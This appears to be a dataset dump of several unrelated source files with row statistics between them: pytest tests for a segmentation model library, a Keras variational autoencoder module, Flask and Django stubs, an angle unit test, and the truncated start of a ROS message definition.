"MIT"
] | null | null | null |
import logging
from functools import partial
import torch
from torch import nn
from inplace_abn.abn import InPlaceABN
from saticl.models import create_decoder, create_encoder
from saticl.models.icl import ICLSegmenter
from saticl.tasks import Task
LOG = logging.getLogger(__name__)
def test_encoder_resnet_unet():
    """ResNet50 encoder for a U-Net decoder emits 5 consistent feature maps."""
    model = create_encoder(name="resnet50", decoder="unet", pretrained=False,
                           output_stride=16, freeze=False, act_layer=nn.ReLU,
                           norm_layer=nn.BatchNorm2d)
    channels = model.feature_info.channels()
    reduction = model.feature_info.reduction()
    LOG.debug("channels: %s", str(channels))
    LOG.debug("reduct.: %s", str(reduction))
    out = model(torch.rand(1, 3, 256, 256))
    # U-Net needs one feature map per stage: expect 5 tensors.
    assert len(out) == 5
    # Each map's channel count and stride must match the feature info.
    for feat, ch, red in zip(out, channels, reduction):
        LOG.debug("%s", str(feat.shape))
        assert feat.shape[1] == ch
        assert red == 256 // feat.shape[-1]
def test_encoder_resnet_deeplab():
    """ResNet50 encoder for DeepLabV3 emits a single consistent feature map."""
    model = create_encoder(name="resnet50", decoder="deeplabv3",
                           pretrained=False, output_stride=16, freeze=False,
                           act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
    channels = model.feature_info.channels()
    reduction = model.feature_info.reduction()
    LOG.debug("channels: %s", str(channels))
    LOG.debug("reduct.: %s", str(reduction))
    out = model(torch.rand(1, 3, 256, 256))
    # DeepLabV3 consumes only the last feature map: expect 1 tensor.
    assert len(out) == 1
    # Channel count and stride must match the feature info.
    for feat, ch, red in zip(out, channels, reduction):
        LOG.debug("%s", str(feat.shape))
        assert feat.shape[1] == ch
        assert red == 256 // feat.shape[-1]
def test_encoder_resnet_deeplabv3plus():
    """ResNet50 encoder for DeepLabV3+ emits two consistent feature maps."""
    model = create_encoder(name="resnet50", decoder="deeplabv3p",
                           pretrained=False, output_stride=16, freeze=False,
                           act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
    channels = model.feature_info.channels()
    reduction = model.feature_info.reduction()
    LOG.debug("channels: %s", str(channels))
    LOG.debug("reduct.: %s", str(reduction))
    out = model(torch.rand(1, 3, 256, 256))
    # DeepLabV3+ needs a low-level and a high-level map: expect 2 tensors.
    assert len(out) == 2
    # Channel count and stride must match the feature info.
    for feat, ch, red in zip(out, channels, reduction):
        LOG.debug("%s", str(feat.shape))
        assert feat.shape[1] == ch
        assert red == 256 // feat.shape[-1]
def test_encoder_tresnet_unet():
    """TResNet-M encoder for a U-Net decoder emits 4 consistent feature maps."""
    model = create_encoder(name="tresnet_m", decoder="unet", pretrained=False,
                           output_stride=16, freeze=False, act_layer=nn.ReLU,
                           norm_layer=nn.BatchNorm2d)
    channels = model.feature_info.channels()
    reduction = model.feature_info.reduction()
    LOG.debug("channels: %s", str(channels))
    LOG.debug("reduct.: %s", str(reduction))
    out = model(torch.rand(1, 3, 256, 256))
    # TResNet exposes one fewer stage than ResNet: expect 4 tensors.
    assert len(out) == 4
    # Channel count and stride must match the feature info.
    for feat, ch, red in zip(out, channels, reduction):
        LOG.debug("%s", str(feat.shape))
        assert feat.shape[1] == ch
        assert red == 256 // feat.shape[-1]
def test_decoder_resnet_unet():
    """U-Net decoder on ResNet50 features produces a full-resolution map."""
    encoder = create_encoder(name="resnet50", decoder="unet", pretrained=False,
                             output_stride=16, freeze=False, act_layer=nn.ReLU,
                             norm_layer=nn.BatchNorm2d)
    decoder = create_decoder(name="unet", feature_info=encoder.feature_info, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
    features = encoder(torch.rand(1, 3, 256, 256))
    assert len(features) == 5
    result = decoder(features)
    # Decoder restores the input resolution with its own channel count.
    assert result.shape == (1, decoder.output(), 256, 256)
    LOG.debug("shape: %s", str(result.shape))
def test_decoder_tresnet_unet():
    """U-Net decoder on TResNet-M features produces a full-resolution map."""
    encoder = create_encoder(name="tresnet_m", decoder="unet",
                             pretrained=False, output_stride=16, freeze=False,
                             act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
    decoder = create_decoder(name="unet", feature_info=encoder.feature_info, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
    features = encoder(torch.rand(1, 3, 256, 256))
    assert len(features) == 4
    result = decoder(features)
    # Decoder restores the input resolution with its own channel count.
    assert result.shape == (1, decoder.output(), 256, 256)
    LOG.debug("shape: %s", str(result.shape))
def test_decoder_tresnet_unet_iabn():
    """U-Net decoder with in-place ABN normalization keeps the output shape."""
    encoder = create_encoder(name="tresnet_m", decoder="unet",
                             pretrained=False, output_stride=16, freeze=False,
                             act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
    # InPlaceABN fuses activation into the norm, so the decoder's
    # activation layer becomes the identity.
    iabn = partial(InPlaceABN, activation="leaky_relu", activation_param=0.01)
    decoder = create_decoder(name="unet", feature_info=encoder.feature_info, act_layer=nn.Identity, norm_layer=iabn)
    features = encoder(torch.rand(1, 3, 256, 256))
    assert len(features) == 4
    result = decoder(features)
    assert result.shape == (1, decoder.output(), 256, 256)
    LOG.debug("shape: %s", str(result.shape))
def test_icl_model_resnet_unet_step_0():
    """ICL segmenter at step 0 has one classifier and returns features."""
    encoder = create_encoder(name="resnet50", decoder="unet", pretrained=False,
                             output_stride=16, freeze=False, act_layer=nn.ReLU,
                             norm_layer=nn.BatchNorm2d)
    decoder = create_decoder(name="unet", feature_info=encoder.feature_info, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
    # extract intermediate features when encoder KD is required
    task = Task(name="222a", dataset="potsdam", step=0)
    model = ICLSegmenter(encoder, decoder, classes=task.num_classes_per_task(), return_features=True)
    # At step 0 there is a single (current) classifier head.
    assert len(model.classifiers) == 1
    sample = torch.rand(1, 3, 256, 256)
    # return_features=True makes the forward return (logits, features).
    outputs = model(sample)
    assert len(outputs) == 2
    logits, (enc_features, dec_features) = outputs
    assert logits.shape == (1, 2, 256, 256)
    assert dec_features.shape == (1, decoder.output(), 256, 256)
    assert len(enc_features) == 5
def test_icl_model_resnet_unet_step_1():
    """ICL segmenter at step 1 grows a second classifier initialized from the old one."""
    encoder = create_encoder(name="resnet50", decoder="unet", pretrained=False,
                             output_stride=16, freeze=False, act_layer=nn.ReLU,
                             norm_layer=nn.BatchNorm2d)
    decoder = create_decoder(name="unet", feature_info=encoder.feature_info, act_layer=nn.ReLU, norm_layer=nn.BatchNorm2d)
    # extract intermediate features when encoder KD is required
    task = Task(name="222a", dataset="potsdam", step=1, add_background=True)
    model = ICLSegmenter(encoder, decoder, classes=task.num_classes_per_task(), return_features=True)
    # Step 1 carries the old classifier plus the new one.
    assert len(model.classifiers) == 2
    model.init_classifier()
    # assert that the init worked
    LOG.info("old weight shape: %s", str(model.classifiers[0].out.weight.shape))
    LOG.info("new weight shape: %s", str(model.classifiers[1].out.weight.shape))
    # Both new-class weight rows must be copied from the old background row.
    assert torch.all(model.classifiers[0].out.weight[0] == model.classifiers[1].out.weight[0])
    assert torch.all(model.classifiers[0].out.weight[0] == model.classifiers[1].out.weight[1])
    sample = torch.rand(1, 3, 256, 256)
    # return_features=True makes the forward return (logits, features).
    outputs = model(sample)
    assert len(outputs) == 2
    logits, (enc_features, dec_features) = outputs
    # Output channels: background + 2 old classes + 2 new classes = 5.
    assert logits.shape == (1, 5, 256, 256)
    assert dec_features.shape == (1, decoder.output(), 256, 256)
    assert len(enc_features) == 5
| 41.103286
| 114
| 0.58458
| 1,100
| 8,755
| 4.516364
| 0.124545
| 0.038043
| 0.02818
| 0.036634
| 0.869767
| 0.863325
| 0.843398
| 0.819444
| 0.819444
| 0.819444
| 0
| 0.038222
| 0.303712
| 8,755
| 212
| 115
| 41.29717
| 0.776739
| 0.102113
| 0
| 0.796512
| 0
| 0
| 0.044371
| 0
| 0
| 0
| 0
| 0
| 0.174419
| 1
| 0.052326
| false
| 0
| 0.046512
| 0
| 0.098837
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
236824b89f8b2a329751a496d5d4e46c2c86aa9e
| 9,877
|
py
|
Python
|
autoencoders/VAE.py
|
Loptt/pong-autoencoder
|
c5123bb2466f644f7513d807044e11a4a17aae22
|
[
"MIT"
] | null | null | null |
autoencoders/VAE.py
|
Loptt/pong-autoencoder
|
c5123bb2466f644f7513d807044e11a4a17aae22
|
[
"MIT"
] | 1
|
2021-03-19T03:06:46.000Z
|
2021-08-02T13:29:05.000Z
|
autoencoders/VAE.py
|
Loptt/pong-autoencoder
|
c5123bb2466f644f7513d807044e11a4a17aae22
|
[
"MIT"
] | null | null | null |
import keras
import tensorflow as tf
from keras import layers, Input, Model
from functools import reduce
from keras.utils.vis_utils import plot_model
from .sampling import Sampling
from .internal import VAEBallTrackInternal, VAEBallTrackNoPaddleInternal, VAEInternal, VAEInternalPerceptual
from .coord_conv import CoordinateChannel2D
class VAE():
    """Convolutional variational autoencoder.

    The encoder is a stack of Conv2D + MaxPooling2D stages ending in a dense
    bottleneck that produces ``z_mean``/``z_log_var`` and a sampled ``z``;
    the decoder mirrors it with Conv2D + UpSampling2D stages and a final
    sigmoid convolution whose kernel is sized to recover the exact input
    resolution.
    """

    def __init__(self, layers, input_shape, latent_size, kernel_size=3, filters=8, beta=1, name='Autoencoder'):
        """Build the encoder, decoder and the trainable internal model.

        :param layers: number of conv/pool stages (mirrored in the decoder).
        :param input_shape: (height, width, channels) of the input images.
        :param latent_size: dimensionality of the latent space.
        :param kernel_size: side length of the square conv kernels.
        :param filters: filter count of the first conv layer; doubled at
            every subsequent encoder stage.
        :param beta: KL-divergence weight forwarded to VAEInternal.
        :param name: name of the internal Keras model.
        """
        self.layers = layers
        self.input_shape = input_shape
        self.latent_size = latent_size
        self.pooling_factor = (2, 2)
        self.kernel_size = (kernel_size, kernel_size)
        self.initial_filters = filters
        # Filled in by create_encoder() and consumed by create_decoder().
        self.final_filters = 0
        self.flat_size = 0
        self.reshaping_shape = (1,)
        self.input_size = reduce((lambda x, y: x * y), input_shape)
        self.beta = beta
        self.encoder = self.create_encoder()
        self.decoder = self.create_decoder()
        self.model = VAEInternal(
            self.encoder, self.decoder, name=name, beta=beta)
        # Prepend the (unknown) batch dimension before building.
        self.model.build((None, *input_shape))
        self.model.compile(optimizer='adam')

    def create_encoder(self):
        """Create the conv encoder returning [z_mean, z_log_var, z]."""
        filters = self.initial_filters
        input_img = Input(shape=self.input_shape, name='input_encoder')
        x = input_img
        for i in range(self.layers):
            x = layers.Conv2D(filters, self.kernel_size, activation='relu',
                              padding='same', name=f'conv{i+1}_enc')(x)
            x = layers.MaxPooling2D(
                self.pooling_factor, padding='same', name=f'maxpool{i+1}')(x)
            filters *= 2
        flat = layers.Flatten(name='flatten')(x)
        bn = layers.Dense(self.latent_size, name='bottleneck')(flat)
        z_mean = layers.Dense(self.latent_size, name="z_mean")(bn)
        z_log_var = layers.Dense(self.latent_size, name="z_log_var")(bn)
        z = Sampling()([z_mean, z_log_var])
        # Saving values for the decoder. Integer division keeps the filter
        # count an int, as Conv2D requires (true division produced a float).
        self.reshaping_shape = x.shape[1:]
        self.final_filters = filters // 2
        self.flat_size = flat.shape[1]
        return Model(input_img, [z_mean, z_log_var, z], name='Encoder')

    def create_decoder(self):
        """Create the conv decoder mirroring the encoder."""
        filters = self.final_filters
        input_decoder = Input(shape=(self.latent_size,), name='input_decoder')
        dec = layers.Dense(self.flat_size, name="decoding")(input_decoder)
        reshaped = layers.Reshape(self.reshaping_shape, name='reshape')(dec)
        x = reshaped
        for i in range(self.layers):
            x = layers.Conv2D(filters, self.kernel_size, activation='relu',
                              padding='same', name=f'conv{self.layers-i}_dec')(x)
            x = layers.UpSampling2D(
                self.pooling_factor, name=f'upsamp{self.layers-i}')(x)
            # Halve with integer division to mirror the encoder's doubling
            # while keeping an int filter count.
            filters //= 2
        # Calculate the kernel size for the last layer, in order for it to
        # have the same width and height as the input image.
        kernel_y = x.shape[1] - self.input_shape[0] + 1
        kernel_x = x.shape[2] - self.input_shape[1] + 1
        decoded = layers.Conv2D(
            self.input_shape[-1], (kernel_y, kernel_x), activation='sigmoid', padding='valid', name='output')(x)
        return Model(input_decoder, decoded, name="Decoder")

    def train(self, train_gen, val_gen, epochs, batch_size=32, callbacks=None):
        """Fit on generators and return the Keras training history."""
        history = self.model.fit(
            train_gen,
            epochs=epochs,
            batch_size=batch_size,
            shuffle=True,
            validation_data=val_gen,
            # None sentinel instead of a shared mutable default list.
            callbacks=callbacks if callbacks is not None else [])
        return history

    # Train by inputting tensors and not generators
    def train_primitive(self, train, val, epochs, batch_size=32, callbacks=None):
        """Fit on in-memory tensors; the autoencoder target is the input."""
        history = self.model.fit(
            x=train, y=train,
            epochs=epochs,
            batch_size=batch_size,
            shuffle=True,
            validation_data=(val, val),
            # None sentinel instead of a shared mutable default list.
            callbacks=callbacks if callbacks is not None else [])
        return history

    def predict(self, imgs):
        """Reconstruct a batch of images through the full model."""
        return self.model.predict(imgs)

    def summary(self):
        """Print encoder, decoder and full-model summaries."""
        self.encoder.summary()
        self.decoder.summary()
        self.model.summary()

    def evaluate(self, data):
        """Return the summed-per-image, batch-mean BCE reconstruction loss."""
        rec = self.model.predict(data)
        reconstruction_loss = tf.reduce_mean(
            tf.reduce_sum(
                keras.losses.binary_crossentropy(data, rec), axis=(1, 2)
            )
        )
        return reconstruction_loss.numpy()
class VAEPerceptual(VAE):
    """VAE variant trained with a perceptual reconstruction loss."""

    def __init__(self, layers, input_shape, latent_size, kernel_size, filters, name):
        # Let the base class assemble the encoder/decoder pair, then swap
        # the internal model for the perceptual-loss one.
        super().__init__(layers, input_shape, latent_size,
                         kernel_size=kernel_size, filters=filters, name=name)
        self.model = VAEInternalPerceptual(
            self.encoder, self.decoder, name=name)
        # Build with a leading (unknown) batch dimension.
        self.model.build((None, *input_shape))
        self.model.compile(optimizer=keras.optimizers.Adam())

    def summary(self):
        """Print the perceptual-network details plus the standard summaries."""
        self.model.summary_perceptual()
        super().summary()
class VAEBallTrack(VAE):
    """VAE variant using the ball-tracking internal model."""

    def __init__(self, layers, input_shape, latent_size, kernel_size, filters, name):
        # Base class builds encoder/decoder; replace the internal model
        # with the ball-tracking variant afterwards.
        super().__init__(layers, input_shape, latent_size,
                         kernel_size=kernel_size, filters=filters, name=name)
        self.model = VAEBallTrackInternal(
            self.encoder, self.decoder, name=name)
        # Build with a leading (unknown) batch dimension.
        self.model.build((None, *input_shape))
        self.model.compile(optimizer=keras.optimizers.Adam(), run_eagerly=True)

    def summary(self):
        """Print the standard encoder/decoder/model summaries."""
        super().summary()
class VAEBallTrackNoPaddle(VAE):
    """VAE variant with a ball-tracking loss that ignores the paddles."""

    def __init__(self, layers, input_shape, latent_size, kernel_size, filters, name):
        # Base class builds the encoder/decoder; swap in the
        # no-paddle ball-tracking internal model afterwards.
        super().__init__(layers, input_shape, latent_size,
                         kernel_size=kernel_size, filters=filters, name=name)
        self.model = VAEBallTrackNoPaddleInternal(
            self.encoder, self.decoder, name=name)
        # Prepend the (unknown) batch dimension before building.
        self.model.build((None, *input_shape))
        # NOTE(review): run_eagerly=True presumably required by the internal
        # loss implementation — confirm against VAEBallTrackNoPaddleInternal.
        self.model.compile(optimizer=keras.optimizers.Adam(), run_eagerly=True)

    def summary(self):
        """Print the standard encoder/decoder/model summaries."""
        super().summary()

    def train(self, train_gen, val_gen, epochs, batch_size=32, callbacks=None):
        """Fit on generators after sizing the coordinate array to the batch."""
        self.model.setup_coordinate_array(batch_size)
        history = self.model.fit(
            train_gen,
            epochs=epochs,
            batch_size=batch_size,
            shuffle=True,
            validation_data=val_gen,
            # None sentinel instead of a shared mutable default list.
            callbacks=callbacks if callbacks is not None else [])
        return history

    # Train by inputting tensors and not generators
    def train_primitive(self, train, val, epochs, batch_size=32, callbacks=None):
        """Fit on in-memory tensors; the autoencoder target is the input."""
        self.model.setup_coordinate_array(batch_size)
        history = self.model.fit(
            x=train, y=train,
            epochs=epochs,
            batch_size=batch_size,
            shuffle=True,
            validation_data=(val, val),
            # None sentinel instead of a shared mutable default list.
            callbacks=callbacks if callbacks is not None else [])
        return history
class VAECoordConv(VAE):
    """VAE variant that prepends coordinate channels (CoordConv) to the
    encoder input.

    NOTE(review): create_decoder applies CoordinateChannel2D directly to the
    1-D latent Input before any reshape to an image tensor; a coordinate
    channel layer presumably expects 4-D (batch, h, w, c) input, so this
    path looks broken — confirm against the CoordinateChannel2D
    implementation before relying on this class.
    """
    def __init__(self, layers, input_shape, latent_size, kernel_size, filters, name):
        super().__init__(layers, input_shape, latent_size,
                         kernel_size=kernel_size, filters=filters, name=name)

    def create_encoder(self):
        """Same as VAE.create_encoder, with coordinate channels appended to
        the input image before the conv stack."""
        filters = self.initial_filters
        input_img = Input(shape=self.input_shape, name='input_encoder')
        x = input_img
        # Append normalized x/y coordinate channels to the image.
        x = CoordinateChannel2D()(x)
        for i in range(self.layers):
            x = layers.Conv2D(filters, self.kernel_size, activation='relu',
                              padding='same', name=f'conv{i+1}_enc')(x)
            x = layers.MaxPooling2D(
                self.pooling_factor, padding='same', name=f'maxpool{i+1}')(x)
            filters *= 2
        flat = layers.Flatten(name='flatten')(x)
        bn = layers.Dense(self.latent_size, name='bottleneck')(flat)
        z_mean = layers.Dense(self.latent_size, name="z_mean")(bn)
        z_log_var = layers.Dense(self.latent_size, name="z_log_var")(bn)
        z = Sampling()([z_mean, z_log_var])
        # Saving values for the decoder
        self.reshaping_shape = x.shape[1:]
        self.final_filters = filters / 2
        self.flat_size = flat.shape[1]
        return Model(input_img, [z_mean, z_log_var, z], name='Encoder')

    def create_decoder(self):
        """Mirror decoder; see the class-level NOTE about the
        CoordinateChannel2D placement on the latent input."""
        filters = self.final_filters
        input_decoder = Input(shape=(self.latent_size,), name='input_decoder')
        # NOTE(review): applied to a (latent_size,) tensor — see class note.
        x = CoordinateChannel2D()(input_decoder)
        dec = layers.Dense(self.flat_size, name="decoding")(x)
        reshaped = layers.Reshape(self.reshaping_shape, name='reshape')(dec)
        x = reshaped
        for i in range(self.layers):
            #x = CoordinateChannel2D()(x)
            x = layers.Conv2D(filters, self.kernel_size, activation='relu',
                              padding='same', name=f'conv{self.layers-i}_dec')(x)
            x = layers.UpSampling2D(
                self.pooling_factor, name=f'upsamp{self.layers-i}')(x)
            filters /= 2
        # Calculate the kernel size for the last layer, in order for it to have the same
        # width and height as the input image
        kernel_y = x.shape[1] - self.input_shape[0] + 1
        kernel_x = x.shape[2] - self.input_shape[1] + 1
        # Add coordinate filter in last conv layer
        decoded = layers.Conv2D(
            self.input_shape[-1], (kernel_y, kernel_x), activation='sigmoid', padding='valid', name='output')(x)
        return Model(input_decoder, decoded, name="Decoder")
| 36.446494
| 112
| 0.623367
| 1,222
| 9,877
| 4.838789
| 0.126023
| 0.047353
| 0.035515
| 0.033486
| 0.801793
| 0.793675
| 0.788601
| 0.788601
| 0.788601
| 0.788601
| 0
| 0.00883
| 0.266174
| 9,877
| 270
| 113
| 36.581481
| 0.806981
| 0.04556
| 0
| 0.74
| 0
| 0
| 0.042799
| 0.009346
| 0
| 0
| 0
| 0
| 0
| 1
| 0.095
| false
| 0
| 0.04
| 0.005
| 0.21
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0032868b7467ee7374b196c4f9443eb1dbd23902
| 242
|
py
|
Python
|
app/api/v2/resources/auth.py
|
misatifelix/fast-food-fast-api
|
083fee0993e8d2d0152b4cd13c1ab558d0ba9283
|
[
"MIT"
] | 2
|
2018-09-26T16:55:50.000Z
|
2020-03-10T08:56:35.000Z
|
app/api/v2/resources/auth.py
|
misatifelix/fast-food-fast-api
|
083fee0993e8d2d0152b4cd13c1ab558d0ba9283
|
[
"MIT"
] | 1
|
2019-10-21T17:13:51.000Z
|
2019-10-21T17:13:51.000Z
|
app/api/v2/resources/auth.py
|
misatifelix/fast-food-fast-api
|
083fee0993e8d2d0152b4cd13c1ab558d0ba9283
|
[
"MIT"
] | null | null | null |
from flask_restful import Resource
class RegisterResource(Resource):
    """Registration endpoint (stub — not yet implemented)."""

    def post(self):
        # TODO: implement user registration.
        pass
class LoginResource(Resource):
    """Login endpoint (stub — not yet implemented)."""

    def post(self):
        # TODO: implement user login.
        pass
class LogoutResource(Resource):
    """Logout endpoint (stub — not yet implemented)."""

    def post(self):
        # TODO: implement user logout.
        pass
| 17.285714
| 34
| 0.652893
| 26
| 242
| 6.038462
| 0.5
| 0.210191
| 0.286624
| 0.363057
| 0.503185
| 0.356688
| 0
| 0
| 0
| 0
| 0
| 0
| 0.272727
| 242
| 13
| 35
| 18.615385
| 0.892045
| 0
| 0
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.3
| false
| 0.3
| 0.1
| 0
| 0.7
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
cc566d05cebd86c4b889c225118123b306bb3b3c
| 2,974
|
py
|
Python
|
src/blogapp/migrations/0004_auto_20211226_1039.py
|
robertsmoto/sodavault
|
200e843be7abe6cc447647bba55c7c1309092e5e
|
[
"BSD-3-Clause"
] | null | null | null |
src/blogapp/migrations/0004_auto_20211226_1039.py
|
robertsmoto/sodavault
|
200e843be7abe6cc447647bba55c7c1309092e5e
|
[
"BSD-3-Clause"
] | null | null | null |
src/blogapp/migrations/0004_auto_20211226_1039.py
|
robertsmoto/sodavault
|
200e843be7abe6cc447647bba55c7c1309092e5e
|
[
"BSD-3-Clause"
] | null | null | null |
# Generated by Django 3.2.3 on 2021-12-26 10:39
from django.db import migrations, models
import utilities.utils_images
class Migration(migrations.Migration):
    """Auto-generated migration: adds pre-rendered image-size CharFields to
    Category and Post, and updates the original ImageFields' help text and
    upload handlers. Do not edit the operations by hand; create a follow-up
    migration instead."""

    dependencies = [
        ('blogapp', '0003_auto_20211011_0924'),
    ]

    operations = [
        # Category: URLs/paths of auto-generated square renditions.
        migrations.AddField(
            model_name='category',
            name='image_lg_square',
            field=models.CharField(blank=True, help_text='automatic size: 500px x 500px', max_length=200),
        ),
        migrations.AddField(
            model_name='category',
            name='image_md_square',
            field=models.CharField(blank=True, help_text='automatic size: 250px x 250px', max_length=200),
        ),
        migrations.AddField(
            model_name='category',
            name='image_sm_square',
            field=models.CharField(blank=True, help_text='automatic size: 200px x 200px', max_length=200),
        ),
        # Post: featured-image renditions at three widths.
        migrations.AddField(
            model_name='post',
            name='featured_lg',
            field=models.CharField(blank=True, help_text='automatic size: 1600px x 800px', max_length=200),
        ),
        migrations.AddField(
            model_name='post',
            name='featured_md',
            field=models.CharField(blank=True, help_text='automatic size: 800px x 400px', max_length=200),
        ),
        migrations.AddField(
            model_name='post',
            name='featured_sm',
            field=models.CharField(blank=True, help_text='automatic size: 400px x 200px', max_length=200),
        ),
        # Post: square thumbnail renditions at three sizes.
        migrations.AddField(
            model_name='post',
            name='thumb_lg',
            field=models.CharField(blank=True, help_text='automatic size: 500px x 500px', max_length=200),
        ),
        migrations.AddField(
            model_name='post',
            name='thumb_md',
            field=models.CharField(blank=True, help_text='automatic size: 250px x 250px', max_length=200),
        ),
        migrations.AddField(
            model_name='post',
            name='thumb_sm',
            field=models.CharField(blank=True, help_text='automatic size: 200px x 200px', max_length=200),
        ),
        # Existing ImageFields: new upload-path callables and help texts.
        migrations.AlterField(
            model_name='category',
            name='image',
            field=models.ImageField(blank=True, help_text='recommended size to 500px x 500px', null=True, upload_to=utilities.utils_images.new_filename_blog_cat),
        ),
        migrations.AlterField(
            model_name='post',
            name='featured_image',
            field=models.ImageField(blank=True, help_text='Recommended size: 1600 x 800px', null=True, upload_to=utilities.utils_images.new_filename_blog_feat),
        ),
        migrations.AlterField(
            model_name='post',
            name='thumbnail_image',
            field=models.ImageField(blank=True, help_text='Recommended size: 500 x 500px', null=True, upload_to=utilities.utils_images.new_filename_blog_thumb),
        ),
    ]
| 39.653333
| 162
| 0.61197
| 336
| 2,974
| 5.220238
| 0.214286
| 0.061574
| 0.08894
| 0.116306
| 0.851197
| 0.834664
| 0.792474
| 0.767389
| 0.767389
| 0.767389
| 0
| 0.061168
| 0.274378
| 2,974
| 74
| 163
| 40.189189
| 0.751622
| 0.015131
| 0
| 0.617647
| 1
| 0
| 0.199522
| 0.007858
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.029412
| 0
| 0.073529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cc5f79cf1227d225010345d2b852c5595753d8f5
| 1,246
|
py
|
Python
|
gfootball/test/common/state/test_angle.py
|
andrewchou/football
|
11aea4d6a92d94e0ec92db9bc7e2214f396f884d
|
[
"Apache-2.0"
] | null | null | null |
gfootball/test/common/state/test_angle.py
|
andrewchou/football
|
11aea4d6a92d94e0ec92db9bc7e2214f396f884d
|
[
"Apache-2.0"
] | null | null | null |
gfootball/test/common/state/test_angle.py
|
andrewchou/football
|
11aea4d6a92d94e0ec92db9bc7e2214f396f884d
|
[
"Apache-2.0"
] | null | null | null |
import unittest
from unittest import TestCase
import numpy as np
from gfootball.common.state.angle import relative_angle_bucket
class AngleTestCase(TestCase):
  """Tests for relative_angle_bucket."""

  def test_relative_angle_bucket(self):
    # Table of (expected bucket, delta position). Buckets cover the eight
    # octants counter-clockwise, starting around the positive x-axis.
    cases = [
        (0, (1.0, -.1)),
        (0, (1.0, 0.0)),
        (0, (1.0, 0.1)),
        (1, (1.0, 1.0)),
        (2, (0.0, 1.0)),
        (3, (-1.0, 1.0)),
        (4, (-1.0, 0.0)),
        (5, (-1.0, -1.0)),
        (6, (0.0, -1.0)),
        (7, (1.0, -1.0)),
        # No angle: the zero vector falls into bucket 0.
        (0, (0.0, 0.0)),
    ]
    for expected, delta in cases:
      self.assertEqual(
          expected,
          relative_angle_bucket(delta_position=np.array(list(delta))))
# Allow running this test module directly with `python test_angle.py`.
if __name__ == '__main__':
  unittest.main()
| 47.923077
| 89
| 0.712681
| 188
| 1,246
| 4.478723
| 0.180851
| 0.033254
| 0.293349
| 0.313539
| 0.739905
| 0.739905
| 0.739905
| 0.739905
| 0.739905
| 0.73753
| 0
| 0.050093
| 0.134831
| 1,246
| 25
| 90
| 49.84
| 0.730983
| 0.006421
| 0
| 0
| 0
| 0
| 0.006472
| 0
| 0
| 0
| 0
| 0
| 0.578947
| 1
| 0.052632
| false
| 0
| 0.210526
| 0
| 0.315789
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
aee836af32d5cee8fdb8ac311ddccdbf0f95b8ce
| 19,062
|
py
|
Python
|
objdetect_msgs/src/objdetect_msgs/msg/_DetectGridScores.py
|
MRSD2018/reefbot-1
|
a595ca718d0cda277726894a3105815cef000475
|
[
"MIT"
] | null | null | null |
objdetect_msgs/src/objdetect_msgs/msg/_DetectGridScores.py
|
MRSD2018/reefbot-1
|
a595ca718d0cda277726894a3105815cef000475
|
[
"MIT"
] | null | null | null |
objdetect_msgs/src/objdetect_msgs/msg/_DetectGridScores.py
|
MRSD2018/reefbot-1
|
a595ca718d0cda277726894a3105815cef000475
|
[
"MIT"
] | null | null | null |
"""autogenerated by genpy from objdetect_msgs/DetectGridScores.msg. Do not edit."""
import sys
python3 = True if sys.hexversion > 0x03000000 else False
import genpy
import struct
import sensor_msgs.msg
import genpy
import objdetect_msgs.msg
import std_msgs.msg
class DetectGridScores(genpy.Message):
_md5sum = "177d931fe6488b6b75f16e4d7b7caf56"
_type = "objdetect_msgs/DetectGridScores"
_has_header = True #flag to mark the presence of a Header object
_full_text = """# Specifies socres on a detection grid that runs (x,y,w,h). If the aspect ratio is fixed, this will change to (x,y,s)
Header header
# The (w,h,x,y) grid that has a response
Grid grid
# A grid of scores across the space that are based on an evaluation
# for each box.
sensor_msgs/MatND scores
# An optional binary mask that is 4 dimensional (w,h,x,y) and
# specifies which entries have valid values
sensor_msgs/MatND mask
# The processing time to calculate the detection
std_msgs/Duration processing_time
================================================================================
MSG: std_msgs/Header
# Standard metadata for higher-level stamped data types.
# This is generally used to communicate timestamped data
# in a particular coordinate frame.
#
# sequence ID: consecutively increasing ID
uint32 seq
#Two-integer timestamp that is expressed as:
# * stamp.secs: seconds (stamp_secs) since epoch
# * stamp.nsecs: nanoseconds since stamp_secs
# time-handling sugar is provided by the client library
time stamp
#Frame this data is associated with
# 0: no frame
# 1: global frame
string frame_id
================================================================================
MSG: objdetect_msgs/Grid
# Specifies a w,h,x,y dense grid
